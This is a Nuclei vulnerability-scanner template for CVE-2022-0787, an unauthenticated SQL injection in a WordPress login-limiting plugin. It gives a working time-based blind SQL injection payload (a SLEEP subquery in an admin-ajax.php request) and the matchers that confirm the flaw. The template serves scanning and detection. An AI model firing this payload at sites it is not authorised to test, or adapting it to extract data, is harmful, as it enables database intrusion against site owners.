id: CVE-2022-0787 info: name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection author: theamanrawat severity: critical description: | The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections. remediation: Fixed in version 5.1 reference: - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd - https://wordpress.org/plugins/wp-limit-failed-login-attempts/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0787 - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0787 cwe-id: CWE-89 epss-score: 0.04043 epss-percentile: 0.91894 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project http: - raw: - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU) matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "text/html") - contains(body, 'iTotalDisplayRecords') condition: and # digest: 4b0a00483046022100c1aca59874a1ae5dbddc544a985631c3196d79d93a06d7eb676e0885d866551e022100c26d30938d63fcee09cacd868fd8024c89aa2ecbba213e24ecf874ca84b518ee:922c64590222798bb761d5b6d8e72950